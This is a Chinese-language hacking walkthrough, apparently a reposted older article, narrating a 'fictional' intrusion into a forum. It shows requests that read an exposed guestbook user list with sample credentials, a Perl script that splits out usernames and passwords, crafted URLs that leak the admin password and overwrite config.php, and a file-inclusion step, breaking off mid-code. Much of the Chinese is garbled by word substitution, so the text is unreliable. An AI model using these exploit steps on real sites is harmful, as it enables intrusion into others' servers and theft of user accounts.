一次虚构的入侵通过

发布时间:2014-11-21 12:46
文 章
摘 要
by analysist http://www.中国4lert.org 这是一次虚构入侵,由于这次入侵的进程都是虚构的,但这次入侵又无比地实正在,由于咱们彻底能够依照内中引见的形式入侵任何一度相似的论坛。 咱们行将入侵的长机根本状况如次: 操作零碎:RedHat Linux v7.1 长机地

by analysist http://www.中国4lert.org 这是一次虚构入侵,由于这次入侵的进程都是虚构的,但这次入侵又无比地实正在,由于咱们彻底能够依照内中引见的形式入侵任何一度相似的论坛。 咱们行将入侵的长机根本状况如次: 操作零碎:RedHat Linux v7.1 长机地点:http://www.notfound.org  网页效劳器:Apache v1.3.20 好了,赘言少说,咱们完工吧! 正常来说,假如一度论坛治理员比拟勤劳的话,咱们该当很难从操作零碎和网页效劳器上找出破绽,而某个治理员看上去就归于比拟勤劳的某种,咱们正在做了一些容易的尝试以后,最终决议从CGI动手。 通过一些工夫的视察和综合,咱们发觉某个论坛上运转的CGI顺序次要有两个,一度是乒坛,名字没据说过,另一度是ExGB GuestBook。随意试了一下那个乒坛,觉得该当是比拟保险的,至多错曲解决做的没有错,我提交了多少个特别的要求连小半零碎消息都没搞到,看来是找没有到什么打破口了。然而ExGB GuestBook呢?破绽可是很多的呀,假如你想晓得破绽的详细底细,能够拜访上面的链接: ExGB GuestBook保守注册用户消息破绽: http://v7.51.net/exploites/gbook1.txt ExGB GuestBook保守超级治理员明码破绽: http://v7.51.net/exploites/gbook2.txt ExGB GuestBook遮盖恣意".php"资料破绽: http://v7.51.net/exploites/gbook3.txt 好了,咱们先来看看某个挥笔簿的注册用户消息,正在IE地点拦输出: http://www.notfound.org/gbook/data/user.list 看看咱们看到了什么? 820 medana!:!cctv6!:[email protected]!:!http://souce.myrice.com!:!xing xing liu yan 23423432!:!111!:[email protected]!:!http://333.com!:!我的挥笔 stzzx!:!sohu.com!:[email protected]!:!http://stzzx.k666.com!:!我的挥笔本 jiayk!:!kingshah!:[email protected]中国.com!:!http://foolqq.myetang.com!:!科幻城 ...... 呜呜。。。注册用户很多嘛,有800多个,看来确实是个比拟出名的大站了,然而干什么要用这样无能的CGI顺序呢?莫非就由于某个CGI顺序的出名度?出名度高就定然好吗?//sigh...现正在的人啊! 我对于该署注册用户的消息自身没有感兴味,然而我很想钻研一下众人喜爱用怎么办的字符串作为明码,因为我写了个小顺序来结合出注册用户的帐号和明码,源代码如次: #!/usr/bin/perl #this tool is designed by analysist #welcome to visit http://www.中国4lert.org [email protected]; if ($ARGC != 1) { print "Usage: $0 \n";  exit(1); } $datafile=shift; if (!(-e $datafile)) {  print "File not found!\n"; } $user="user.db"; $pass="pass.db"; if (-e $user) {  unlink $user; } if (-e $pass) {  unlink $pass; } open (DATA,$datafile); open (USER,">>$user"); open (PASS,">>$pass"); while ($line=) {  if ($line =~ /\!:!\/) {  @data=split(/\!:!\/,$line); print USER $data[0]."\n"; print PASS $data[1]."\n";  } } 很容易吧,那里我提议你进修Perl言语,由于它确实是一种无比优良的言语,它的文本解决威力是其它任何言语都无奈比较的。 综合的后果确定让你惊讶,大概90%之上的用户明码是数目字序列,再有大概5%的用户帐号和明码相反,这没有得没有让你对于国际用户的保险认识担心吧?! 好了,上面咱们看看超级治理员的明码是什么,咱们提交一度那样的要求: http://www.notfound.org/gbook/index.php?action=regname=testpassword1=%24passpassword2=%[email protected]=http%3A%2F%2Fwww.test.orgtitle=%24passubb=1html=1page=5up=headerdown=footerregsub=%CC%E1%BD%BB%C9%EA%C7%EB haha...咱们正在IE的题目拦看到了超级治理员的明文化码,本来是"iloveu",看来某个治理员还是个无情之人,//puke... 我没有计划用某个明码试着去空降这台效劳器,自身没有什么意思嘛,并且很简单被人发觉,我才没那样傻呢,咱们该当换个打破口。 咱们看到ExGB GuestBook再有一度遮盖".php"资料的破绽没有益用呢,应用某个破绽,咱们能够正在该效劳器上以网页 Server的权限构建任何".php"资料,千万该资料的形式是绝对于流动的,看上去仿佛没有什么大的作用。 再细心的看了一下那个论坛,本来乒坛是用的外人的,能够去键入的呀。赶紧把那个乒坛的源码抓返回,细心的综合了一下,终究发觉了一度打破口。 内中配置资料"inc/config.php"中有如次片段: $langdir="."; $langfile="cn.php"; ...... ?> 而乒坛主资料"forum.php"中又有如次片段: require("inc/config.php"); include($langdir."/".$langfile); ...... ?> 晓得我要做什么了吧?提交一度上面的要求: http://www.notfound.org/gbook/index.php?action=regname=../../forun/inc/configpassword1=%24passpassword2=%[email protected]=http%3A%2F%2Fwww.test.orgtitle=%24passubb=1html=1page=5up=headerdown=footerregsub=%CC%E1%BD%BB%C9%EA%C7%EB 呵呵。。。现正在咱们曾经顺利的遮盖了"/inc/config.php"资料,该资料的形式曾经成为了: $title="我的挥笔本"; $pass="test"; $home="http://www.test.org"; $email="[email protected]"; $admin


上一篇:用芯片换稳固磊科54m无路线由仅370
下一篇:《实况国足2009》巨匠联赛转会顺利机率